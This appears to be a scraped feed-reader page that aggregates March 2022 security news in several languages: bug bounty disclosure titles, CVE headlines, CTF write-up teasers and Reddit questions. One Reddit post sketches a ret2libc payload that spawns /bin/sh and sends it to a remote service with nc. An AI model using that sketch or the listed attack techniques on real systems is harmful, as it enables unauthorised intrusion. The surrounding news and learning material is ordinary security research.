    利用抽象语法树挖掘Fastjson可用的Gadget by ourren 利用 gateway-api 攻击 kubernetes by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-20 Review
    利用抽象语法树挖掘Fastjson可用的Gadget by ourren 利用 gateway-api 攻击 kubernetes by ourren 更多最新文章,请访问SecWiki
  • Open

    Creating a reverse C2 channel using powershell c# and python
    https://www.youtube.com/watch?v=Yoj0bQkIRqU submitted by /u/luzunov [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Three
    The nukes are coming! The nukes are coming!Enjoy!Related posts:Courtesy of Republic of Bulgaria! - Part TwoCourtesy of Republic of Bulgaria!A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT AnalysisAn Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An AnalysisWhat You Get From "Peasant-aria
  • Open

    Dirty Pipe Vulnerability in Linux
    Article URL: https://dietpi.com/blog/?p=1379 Comments URL: https://news.ycombinator.com/item?id=30741595 Points: 2 # Comments: 0
  • Open

    MyEnv := ZAP+Proxify+Burp
    여러분들은 보안 테스팅하실 떄 어떤 도구들을 사용하시나요? 저는 ZAP을 메인으로 그리고 Burpsuite를 보조 스캐너로 사용합니다. 제가 2021년 마지막글("나의 메인 Weapon 이야기")에 Proxify에 대해 언급을 했었습니다. 오늘은 이 Proxify를 이용하여 제가 새로 구성하려는 분석 환경과 이유, 그리고 이를 통해 더 얻고자 하는 것들에 대해 이야기하려고 합니다. Why 앞서 제가 분석 환경에 변화를 주려는 이유를 먼저 설명하겠습니다. 아주 오래전부터 분석에서 사용하는 데이터의 재 활용 필요성은 익히 알고 있었습니다. 그래서 여러가지로 고민을 해봤지만, 너무 크고 복잡한 그림만 나올 뿐 구축해서 잘 사용해볼 수 있는 형태의 그림은 없었죠.
  • Open

    Bulk Extractor showing Explicit Websites
    Howdy all, Okay, so whilst I was going through data of my client I found some explicit websites in the domain_histogram result from Bulk Extractor! Now, the thing that has me awake is, same link was available over at all hosts! So, I downloaded a fresh Iso Image from Windows official link, Made a Virtual Machine and Captured its ram! Found the same links xD I've no idea to what and how is this happening. Any leads anyone can help me with? submitted by /u/GloryHunter9 [link] [comments]
  • Open

    RXSS
    SecurityScorecard disclosed a bug submitted by ww1: https://hackerone.com/reports/1418413
    Insecure crossdomain.xml on https://vdc.mtnonline.com/
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/838817
    Exposed .bash_history at http://21days2017.mtncameroon.net/.bash_history
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/801437

  • Open

    Frelatage: A fuzzing library to find vulnerabilities and bugs in Python applications
    submitted by /u/FrenchFuzzer [link] [comments]
  • Open

    Ukraine — Point de situation au 20 mars
    Les dernières 24h Continue reading on Medium »
    OSINT — L’espion
    This short article presents my solution to the CTF challenge titled “L’espion”, an open source intelligence (OSINT) challenge available on… Continue reading on InfoSec Write-ups »
    Searchlight — IMINT
    Hello, blue teamers, Continue reading on Medium »
    HacktoriaWalkthrough — Hacktoria: Geolocation 27
    This time I´m gonna write another Writeup about Geolocation: Continue reading on Medium »
    Berlins hässlichste Business-Center — wo der Verfassungsschutz Büros anmietet
    Das Bundesamt für Verfassungsschutz betreibt in Deutschland Tarnbehörden, um seine Büros und Tätigkeiten möglichst schwer nachvollziehbar… Continue reading on Medium »
  • Open

    RAM Memory Analysis volatility
    Hi, I want to perform an analysis of the RAM of an Android phone using volatility, and for this I have a .bin file, a "System.map " and a "module.dwarf ". The tool I have to use is Volatility and I am not able to set the profile using the previous files to perform the analysis. Can someone please help me? Thanks submitted by /u/Zealousideal_Ad601 [link] [comments]
    Falcon Neo - Imaging
    Can someone let me know how falcon neo read/detect the source drive connected. submitted by /u/Pepperknowsitall [link] [comments]
  • Open

    Parent PID Spoofing (Mitre:T1134)
    Introduction Parent PID spoofing is an access token manipulation technique that may aid an attacker to evade defense techniques such as heuristic detection by spoofing The post Parent PID Spoofing (Mitre:T1134) appeared first on Hacking Articles.
    Parent PID Spoofing (Mitre:T1134)
    Introduction Parent PID spoofing is an access token manipulation technique that may aid an attacker to evade defense techniques such as heuristic detection by spoofing The post Parent PID Spoofing (Mitre:T1134) appeared first on Hacking Articles.
  • Open

    Findsecret
    Merhaba arkadaşlar. Bugün sizlere Go programlama dili kullanarak geliştirdiğim bir aracı tanıtacağım. Continue reading on Medium »
    Echidna 漏洞賞金計劃
    賺取高達 $50,000 的賞金 Continue reading on Medium »
    Metasploit
    Anatomy and Structure of Metasploit Basic commands and configuration  Scanning services with Metasploit  Meterpreter basics Continue reading on Medium »
    BugBounty: H T M L Injection
    (Do you want to create your own hacking tools? Do you want to create a tool that can be undetectable by antivirus, can hack any windows… Continue reading on Medium »
    Web Hacking: A drama
    Part-One: An arrogant web app. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Browser in the Browser
    submitted by /u/dmchell [link] [comments]
  • Open

    Where to focus further learning?
    Working in cyber I realized my knowledge is inch deep and a mile wide when it comes to technology. I've earned my ECIH, Sec+ and recently provisionally passed my CISSP. I have only 4 year experience and in a security management role. I definitely feel like I have imposter syndrome at times and want to build my technical knowledge but there is just SO much out there to learn. Where do you feel it's most important to focus attention when leading an IR/Blue Team? My overall goal is to advance I'm cyber/IT management by landing a director role and more long term CISO. Any thoughts or advice here? submitted by /u/gnomeparadox [link] [comments]
    Find hostnames in DNS records
    I'm doing a penetration test, I've tried brute forced the customer's domain to find hostnames. I'm sure there are others that exist but I can't find them. They are a fairly global company. I know they'll have users and customers all over the world requesting various apps. Is there a way to identify hostnames through public sources? I mean, is there a DNS server (like 1.1.1.1) that disclosures the DNS records people have requested? Or something like this? submitted by /u/InternalCode [link] [comments]
  • Open

    Asking for help
    Hello guys , could you recommend me some learning material or roadmap as I want to learn exploit development , what to learn and etc, thank you in advance. submitted by /u/Shokhjakhon23235 [link] [comments]
    Exploit dev on Windows Subsystem for Linux 2 possible?
    Hello all. I have a question for which I cannot find information on google. I would like to learn how to write simple exploits for linux and I wonder if I can do it using WSL2, is this technology suitable for Linux exploit development training? Thanks submitted by /u/JunkieChunkie [link] [comments]
  • Open

    FreeBuf 早报 | 钓鱼软件利用对乌入侵获取加密货币;欧洲警告与俄入侵有关飞机GPS中断
    CISA与FBI今天表示,他们正意识到美国和世界各地的卫星通信网络面临“可能的威胁”。
  • Open

    CVE-2022-27226: CSRF to RCE in iRZ Mobile Routers through 2022-03-16
    Article URL: https://johnjhacking.com/blog/cve-2022-27226/ Comments URL: https://news.ycombinator.com/item?id=30730055 Points: 2 # Comments: 0
  • Open

    LOLBINed — CyberGhost VPN (PeLauncher.exe/Dashboard.exe)
    Ghostbusters Continue reading on Medium »

  • Open

    Favicon Hash ile Phishing web siteleri nasıl bulunur
    Bug bounty, savunmasız web sitelerini bulmak için Favicon’un Hash’ini kullanır. Yazılımın farklı sürümleri bazen farklı Favicon… Continue reading on Medium »
    Software: Uncover
    In an article published on blackhatethicalhacking.com we’re introduced to the nifty tool Uncover. Continue reading on Medium »
    Ukraine — Point de situation au 19 mars
    Les dernières 24h Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 24
    This morning I decided to make a Geolocalization exercise in Hacktoria. Continue reading on Medium »
  • Open

    PIN BYPASS
    Yoti disclosed a bug submitted by ww1: https://hackerone.com/reports/1257586 - Bounty: $1000
    Military name,email,phone,address,certdata Disclosure
    U.S. Dept Of Defense disclosed a bug submitted by unknownsh: https://hackerone.com/reports/1490133
    CVE-2020-3452 on https:///
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455257
    Arbitrary File Deletion (CVE-2020-3187) on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455266
    CSRF - Modify User Settings with one click - Account TakeOver
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799895
    Reflected XSS - in Email Input
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799839
    IDOR - Delete Users Saved Projects
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/800608
    CSRF - Delete Account (Urgent)
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799855
    CVE-2021-42567 - Apereo CAS Reflected XSS on https://
    U.S. Dept Of Defense disclosed a bug submitted by 3th1c_yuk1: https://hackerone.com/reports/1446236
    XSS because of Akamai ARL misconfiguration on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1305477
    RCE .api/nr/report/{id}/download
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1348154 - Bounty: $1000
    XSS Stored on https://seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1350671
    OS command injection on seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1360208 - Bounty: $1000
    SSRF + RCE fastCGI POST /api/nr/video
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1354335 - Bounty: $1000
  • Open

    some ODs with various fonts
    http://www.hixie.ch/resources/ https://mirrors.cloud.tencent.com/adobe-fonts/ http://www.paulvlachou.com/fonts/ http://somospixel.com/fonts/ submitted by /u/subwaytech [link] [comments]
    Is the mega discord gone? If so does anyone have a link? Also im sorry if this is the wrong subbreddit for this but i thought this is where I found it initially. Thanks
    submitted by /u/taramj13 [link] [comments]
    How to deploy API to Netlify
    The API I have works fine locally, but It keeps failing when i try to deploy to netlify. I keep getting this error: node:internal/url:552 5:51:22 PM: throw new ERR_INVALID_URL(input); 5:51:22 PM: ^ 5:51:22 PM: TypeError [ERR_INVALID_URL]: Invalid URL 5:51:22 PM: at new NodeError (node:internal/errors:371:5) 5:51:22 PM: at onParseError (node:internal/url:552:9) 5:51:22 PM: at new URL (node:internal/url:628:5) 5:51:22 PM: at Function.parseURL (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:113:76) 5:51:22 PM: at Commander._RedisClient_initiateOptions (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:294:36) 5:51:22 PM: at new RedisClient (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:77:148) 5:51:22 PM: at new Com…
  • Open

    Insecure Direct Object Reference Exposes all users of Microsoft Azure Independent Software Vendors
    Hi Everyone, Continue reading on Medium »
    For the first Bounty, it takes a few challenging months, but only a few days for the second.
    Good day, everyone! I spent nearly three hours looking for this bug, but it took me three months to uncover the bug that brought me my… Continue reading on Medium »
    How to Create Your Own Nuclei Template: Part 1 (Indonesia Version)
    Perkenalkan nama saya Muhammad Daffa, seorang mahasiswa di salah satu kampus di Surabaya. Sekarang saya sedang bekerja part time sebagai… Continue reading on Medium »
    Adobe bug bounty using IDOR, Confidential data leaks
    I hacked adobe using IDOR, and got this Continue reading on Medium »
    WardenSwap x Immunefi: Launching a Bug Bounty Program with a reward of up to $100,000 USD.
    WardenSwap aims to give rewards to white hats who uncover bugs in our smart contracts and/or vulnerabilities in our protocols by working… Continue reading on WARDEN Official »
    subNum
    Crawl all URLs and check for subdomain takeover vulnerability. Continue reading on Medium »
    I got Premium Hacking and Bug Bounty Courses *FREE*
    Yes, Yes, Yessssss! I got many, I think more than 1000+ premium ethical hacking and bug bounty courses FREE. Only you have to spend your… Continue reading on Medium »
    Bypass confirmation to add payment method.
    Summary: Continue reading on Medium »
  • Open

    Scans for Movable Type Vulnerability (CVE-2021-20837)
    Article URL: https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454 Comments URL: https://news.ycombinator.com/item?id=30725737 Points: 1 # Comments: 0
  • Open

    Scans for Movable Type Vulnerability (CVE-2021-20837)
    Article URL: https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454 Comments URL: https://news.ycombinator.com/item?id=30725737 Points: 1 # Comments: 0
    Computer scientist identifies JavaScript vulnerability in thousands of websites
    Article URL: https://hub.jhu.edu/2022/03/14/computer-scientist-identifies-javascript-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30725274 Points: 13 # Comments: 1
  • Open

    XSS Weakness(JSON XSS) to Valid XSS
    오늘은 XSS Weakness를 트리거 가능한 XSS로 바꾸는 방법에 대해 이야기하려고 합니다. 새로운 기술은 아니고 오래전부터 다들 사용하시던 트릭일텐데, 생각해보니 제가 따로 정리했던 적은 없어서 이참에 글로 남겨둘까 합니다. 그럼 시작하죠 🔥 XSS Weakness 우리는 XSS 테스트 중 Content-Type이 JSON인 Reflection 을 발견하는 경우가 있습니다. 이는 ZAP이나 Burpsuite에서도 Active/Passive Scan 등을 통해 체크해주고 있는 부분이죠. Alert (Rule) ZAP Cross Site Scripting Weakness (Reflected in JSON Response) Burpsuite Cross-site scripting (reflected) / Info 당연히 도구에서 탐지는 정보성 탐지고, 크게 우회되는 패턴이 없다면 버려지는 항목들입니다.
    [Cullinan #29] Update 3 Pages
    컬리넌 로그 #29입니다. DOM Clobbering, ZAP, Command Injection 내 업데이트가 있었습니다. Update DOM Clobbering (Add zap script) Update ZAP (Update build snippet) Update Command Injection (Add bypass technic with OOB)
  • Open

    SecWiki News 2022-03-18 Review
    浅谈数据安全 by ourren 利用服务网格为基于微服务的应用程序实施 DevSecOps by ourren 浏览网页就能泄露手机号的小秘密 by ourren 攻击面管理(ASM)技术详解和实现 by ourren ATT&CK红队评估三套靶场渗透记录 by ourren 使用DNS Tunnel技术的Linux后门B1txor20 by ourren ApolloScanner: 自动化巡航扫描框架 by ourren Java 之 CommonsCollections利用链初探 by ourren 2021西湖论剑IOT RW-WriteUp by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-18 Review
    浅谈数据安全 by ourren 利用服务网格为基于微服务的应用程序实施 DevSecOps by ourren 浏览网页就能泄露手机号的小秘密 by ourren 攻击面管理(ASM)技术详解和实现 by ourren ATT&CK红队评估三套靶场渗透记录 by ourren 使用DNS Tunnel技术的Linux后门B1txor20 by ourren ApolloScanner: 自动化巡航扫描框架 by ourren Java 之 CommonsCollections利用链初探 by ourren 2021西湖论剑IOT RW-WriteUp by ourren 更多最新文章,请访问SecWiki
  • Open

    0d1n - Tool for automating customized attacks against web applications. Fully made in C language with pthreads, it has fast performance.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    0d1n
    Tool for automating customized attacks against web applications. Entirely made in C language with threads, it has fast performance. https://github.com/CoolerVoid/0d1n submitted by /u/CoolerVoid [link] [comments]
  • Open

    Pentesting: The Relevance, Top 10 Tools, And More
    No content preview
  • Open

    Pentesting: The Relevance, Top 10 Tools, And More
    No content preview
  • Open

    Pentesting: The Relevance, Top 10 Tools, And More
    No content preview
  • Open

    Brooklyn 99 CTF - Process and Report
    Lab Goals. This one is a standard “capture the flag” style box with no other goals, so you’re own your own to figure out the methodologies. Continue reading on Medium »
  • Open

    SolarWinds 发出针对 Web Help Desk 用户攻击的警告
    近日,软件开发公司SolarWinds对用户发出警告:安装未打补丁的Web Help Desk软件可能会导致遭受网络攻击的风险。
    FreeBuf甲方群话题讨论 | 聊聊企业SOC平台建设
    如何理清SOC相关服务及产品间的关系及组织性,彼此该如何配合,以发挥最大效率?
    数字金融反欺诈技术应用分析报告(2021年)
    在新一轮科技革命和产业变革的背景下,金融业数字化浪潮蓬勃兴起,大数据、人工智能、云计算等新技术与金融业务深度融合,数字化转型已成为金融业提高服务质量和竞争力的共同选择。
    FreeBuf周报 | 3.15 首设安全实验室应对信息安全;安卓银行木马Escobar 正伺机而动
    本届3·15晚会首次设立了信息安全实验室,并测试了两款产品,引起了广泛关注。
    安全大讲堂 | 谭晓生:安全即服务,万物互联下的网络安全新机遇
    网络安全商业化“路在何方”?
    华硕警告针对路由器的 Cyclops Blink 恶意软件攻击
    Cyclops Blink能在目标设备上建立与攻击者的持久性链接,使其能够远程访问受感染的网络。
    匿名者黑客组织宣称将继续支持乌克兰对抗俄罗斯
    匿名者黑客团体及其附属宣称,将继续针对俄罗斯政府和私人组织展开网络攻击。
    微软即将在6月份彻底淘汰Internet Explorer浏览器
    微软今天提醒Windows用户,他们将会在今年6月份从部分win10版本里淘汰Internet Explorer浏览器。
  • Open

    Decrypt using OpenSSL
    hi there people, I'm trying to decrypt a salted des3 file using openssl: openssl des3 -d -salt -pbkdf2 -in file.des3 -out file.txt -k password But it shows me the next error: bad decrypt 140292356945280:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt Can you guys figure out what is wrong with the command or am I using smth already deprecated? Thanku all submitted by /u/TaryG19 [link] [comments]
  • Open

    Zones and conduits in accordance with IEC 62443 standards
    There are several high-level reference models proposed by different sources and industry leaders to assist in the initial definition and separation of zones and conduits, such as: The DuPont Reference Architecture Tofino Security high-level model Honeywell Reference Architecture Rockwell Reference Architecture. Siemens Reference Architecture. How is each model being used in the industrial automation and control systems to define and separate zones and conduits in accordance with IEC 62443 standards? submitted by /u/Economy-Function-337 [link] [comments]
    Finding ret2Libc's system() address on a remote machine. I need help utilizing extra information.
    I have a similar problem as this StackExchange question. ​ I have the following scienarion: a vulnerable program running in a server and can be accessed using netcat I have a copy of that program locally and I can exploit it locally using ROP: ./vuln garbage + &system() + &exit() + &"/bin/sh" now I want to exploit it remotely so technically I would be executing this command: echo -e "garbage + &system() + &exit() + &/bin/sh" | nc host port My problem is: I do not know what is &system() on the remote machine. Is there any way to get it without brute force ie: trying all memory address from 0x00000000 -> 0xFFFFFFFF BUT, in my case, there is some extra information given. Every time the program also prints the buf address like this:- Enter a string: Here's a clue! The address of buf is 0xffffdc0c But I don't know how to utilize this piece of information. How do I use this? submitted by /u/reddotname [link] [comments]
    Kaspersky alternatives?
    Well with the warning that BSI put out alerting users that Kaspersky could possibly be compromised (either now or in the future) my company is looking for alternatives for their Antivirus software. We'll probably begin the process of evaluation next week but I wanted to get a head start and hear some of the netsec communities opinions on alternatives to Kaspersky. We are in the process of becoming ISO 27001 compliant so every procedure is under extreme scrutiny and requires extensive documentation. Some current candidates are Sopho, Bitdefender and Trend Micro. What are your thoughts on ease of deployment, cost, security and privacy policies of the aforementioned alternatives? Any other suggestions for alternatives? Any comments or suggestions are greatly appreciated, thanks. submitted by /u/Goldsound [link] [comments]

  • Open

    Random number generator enhancements for Linux 5.17 and 5.18
    submitted by /u/zx2c4 [link] [comments]
    Post auth RCE based in malicious LUA plugin script upload SCADA controllers located in Russia
    submitted by /u/bertinjoseb [link] [comments]
    Detecting Headless Chrome: Spotlight on Puppeteer-Extra-Plugin-Stealth
    submitted by /u/threat_researcher [link] [comments]
    Unraveling Assets from Android Apps at Scale - An OSINT API allows you to scan over half a million Android apps for subdomains, S3 buckets, URL Params and more.
    submitted by /u/alt-glitch [link] [comments]
    Mitigating CVE-2022-0811: Arbitrary code execution affecting CRI-O
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    Is this networking knowledge enough ?
    Is learning how to manage a network,network simulation with GNS3,and installing physical network has to do with security? I can’t deal with gns3 but i can use packet tracer. But what i am asking is that is it enough to learn about the protocols,routing,ip addressing ,and the tcp/ip stack if i want to work in penetration testing. Or should i use a network simulation and dig deeper? I feel that practicing thorough htb and thm teaches me more now that i learned the fundamentals. And when i am stuck with something like active directory i just go into a room in thm or read about it. submitted by /u/Ramseesthe4th [link] [comments]
    HTTP 'PUT' method is enabled on Printer's Web Server
    Hey everyone, I'm a new infosec analyst and I've been tasked to run a vulnerability scan against our company's printers. Our scanner found that the HTTP 'PUT' method is enabled on several of our printers' webservers. How would I go about remediating this vulnerability if it's a HP Embedded Web Server? Right now, there is zero access control configured to log into the web server. Would enabling that help fix the vulnerability? I don't see anywhere in the server settings to disable the method. Thanks so much! submitted by /u/Zgame200 [link] [comments]
    Advice for an security analyst interview at a bank?
    Background about me: few years of low level SOC. mainly just looking at alerts and logs, vuln scanning. honestly dont really do much About the position: not entry level; the requirements look pretty heavy. seems to be a mix of both technical (alerts, incident response, playbooks, risk assessment, threat analysis, vulnerability, backups, pentesting, and more) and GRC stuff. The technical stuff, I have familiarity with most of the stuff, but little practical experience. GRC/compliance stuff, I have no experience whatsoever and have no clue on what to study. Do I just familiarize myself with a bunch of standards like iso 27001? Anyone have experience interviewing or working at a bank? Looking for general tips or guidance on how to prepare for this interview. Thanks! submitted by /u/mygumsaredying [link] [comments]
    Is a cloud provider considered to be a Data Steward or a Data Custodian?
    Help me settle a debate. Is a cloud provider considered to be a Data Steward or a Data Custodian? My vote is they are the Data Steward. A colleague insists they are the Data Custodian. Either way, they have shared responsibility, but again, I'm looking to make sure to use the correct terminology. submitted by /u/paulexander [link] [comments]
    ELI5 Investigating a Suspicious Website
    Can someone walk me through how I would investigate a URL that’s been flagged as suspicious? a good example: omnatuor[.]com submitted by /u/annonuk2020 [link] [comments]
    OpenSSL resources?
    How do you started on OpenSSL? Currently doing some CTF and I encounter some OpenSSL questions, I don't have any idea how to study this one (done with searching on Youtube) Thank you submitted by /u/pldc_bulok [link] [comments]
    Building a security program at a startup?
    I'm a mid-level software engineer with some security experience interviewing with early stage startups for application security engineering positions. Many of these companies are either building a security team from scratch, or have 1-2 security engineers already. I'll primarily be working with developers on doing source code reviews, tool development and automation. I'm assuming there won't be much real mentorship/guidance, so I'd like to know what are some of the first things a new security engineer at an early stage startup should do to hit the ground running. submitted by /u/cppnewb [link] [comments]
    Bachelor Thesis Topic Ideas
    Hello everyone, I'm doing my bachelor's in computer science and I'll be writing my bachelor's thesis. Actually my professor offered a thesis topic related to implementation of access control with certificates on vpn. It's nice but requires me to be at the university and unfortunately I can't be at the same city in the next semester. So I'm looking for more research oriented topics related to security and preferably defensive side. I'd appreciate if anyone can suggest me some topics, so I can talk to my prof in the next meeting with different ideas. Thank you in advance. submitted by /u/guneysss [link] [comments]
    Good Security dashboard Template
    Hi Security Folks, What are the security metrics you are collecting and reporting every week? Is there a good security dashboard template that I can use for my team/upper c-level manager report? submitted by /u/Calm_Scene [link] [comments]
  • Open

    LOLBINed — F-Secure Support Tool (FSDIAG)
    Continue reading on Medium »
    KABLOSUZ AĞ SIZMA TEKNİKLERİ NELERDİR VE KABLOSUZ AĞ GÜVENLİĞİ NASIL SAĞLANIR?
    Kablosuz iletişim teknolojilerinde en önemli paya sahip olan Wi-Fi, radyo dalgalarının kullanılması yoluyla belirli mesafelerde bulunan… Continue reading on Medium »
  • Open

    Ukraine — Point de situation au 18 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    Analyzing Malware with Hooks, Stomps, and Return-addresses
    submitted by /u/dmchell [link] [comments]
  • Open

    CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
    CVE-2021-28372, a vulnerability in third-party software commonly built into many IP cameras, highlights issues in IoT supply chain security. The post CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable appeared first on Unit42.
  • Open

    Escaping Dirty Pipe (a.k.a. CVE-2022-0847), mostly unscathed
    Article URL: https://blog.replit.com/dirtypipe-kernel-vulnerability Comments URL: https://news.ycombinator.com/item?id=30714414 Points: 1 # Comments: 0
    CVE-2022-23812: node-ipc contains malicious code targeting Russia and Belarus
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-23812 Comments URL: https://news.ycombinator.com/item?id=30707728 Points: 39 # Comments: 2
  • Open

    Indirect Command Execution: Defense Evasion (T1202)
    Introduction Indirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense The post Indirect Command Execution: Defense Evasion (T1202) appeared first on Hacking Articles.
    Indirect Command Execution: Defense Evasion (T1202)
    Introduction Indirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense The post Indirect Command Execution: Defense Evasion (T1202) appeared first on Hacking Articles.
  • Open

    IDOR at https://demo.sftool.gov/TwsHome/ScorecardManage/ via scorecard name
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1472721
    Use of uninitialized value of in req_parsebody method of lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1514863 - Bounty: $2400
    Theft of protected files on Android
    ownCloud disclosed a bug submitted by n00b-cyborg: https://hackerone.com/reports/1454002 - Bounty: $50
    Instance Page DOS within Organization on TikTok Ads
    TikTok disclosed a bug submitted by arsene_lupin: https://hackerone.com/reports/1478930 - Bounty: $200
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    SecWiki News 2022-03-17 Review
    在野无状态扫描的综合研究 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-17 Review
    在野无状态扫描的综合研究 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Unable to run Plaso Autopsy ingest module on Windows 10. Anyone know a workaround?
    I’m running Autopsy 4.19.3 on Windows 10 and I’m unable to run the plaso module against any data source. The logs show this error: SEVERE: Plaso experienced an error during analysis (data source = Y247388.E01, objId = 1, pipeline id = 3, ingest job id = 2) java.nio.file.InvalidPathException: Illegal char at index 92: C:\Users\forensics\Documents\Cases\Y247388-New\ModuleOutput\plaso\2022-03-16 15-15-11 GMT-07:00 It looks like the plaso module is trying to create a file or folder with a colon in it from the timezone information. Is there any way to get around this? submitted by /u/thenebular [link] [comments]
    An employee downloaded a virus to computer.
    What are the chances it was able to access entire server? Have a team working on it but waiting and wondering. submitted by /u/Otherwise-Special-95 [link] [comments]
  • Open

    Bypassing Stack Canaries and NX/DEP (Ret2Lib-C) - Bird - [Intigriti 1337UP LIVE CTF 2022]
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    American NGO affected by your recklessness (node-ipc vulnerability)
    Article URL: https://github.com/RIAEvangelist/node-ipc/issues/308 Comments URL: https://news.ycombinator.com/item?id=30711545 Points: 25 # Comments: 13
  • Open

    X is a New Horror Cult Classic
    BOOGIE NIGHTS meets THE TEXAS CHAINSAW MASSACRE in Ti West’s latest Continue reading on Cinapse »
  • Open

    Parameter Pollution - Zero Day
    Summary : Continue reading on Medium »
    Cansina — Open Source Hidden Content Discovery Tool on Linux
    Reconnaissance is one of the first steps to conduct within a pen test engagement. During this stage, information is gathered using… Continue reading on Medium »
    My First Blind SQL Injection
    Hello Hackers and security community.. Continue reading on Medium »
    Sensitive Information disclosure through unrestricted Directories
    Hello Hackers and Security community.. Continue reading on Medium »
    Google Dorks and a SQL Dump
    A odd Google Dorking method I used to successfully find a sql dump. Continue reading on Medium »
    The 13 Best Vulnerable Web Applications & Vulnerable Websites for Testing
    This list contains a variety of vulnerable websites, vulnerable web apps, battlegrounds and wargames communities. Continue reading on Medium »
  • Open

    FreeBuf 早报 | 2025年中国网安市场规模将超214亿美元;乌安全机构逮捕支持俄军的黑客
    乌克兰安全局(SSU)声称已拘捕一名为俄罗斯部队提供技术支援的黑客。
    dompdf中未修补的RCE漏洞会影响HTML到PDF转换器
    研究人员在“dompdf”中发现了一个未修补的安全漏洞,如果该漏洞被成功利用,可能会导致某些配置中的远程代码被执行。
    GoDaddy 托管的数百个网站,短时间内被部署了后门
    GoDaddy管理服务器上托管的部分WordPress网站,被部署了大量后门。
    新的“B1txor20”Linux 僵尸网络正利用 Log4J 漏洞进行传播
    这种新的B1txor20恶意软件能够将目标设备纳入僵尸网络并充当下载和安装rootkit 的渠道。
    Facebook删除了伪造的乌克兰总统泽连斯基假视频
    最近Facebook删除了一段社交网络上传播的假视频,在这则假视频中,乌克兰总统泽连斯基要求乌克兰军队放下武器投降。
  • Open

    Diagrams and instructions for toilets.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...
    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
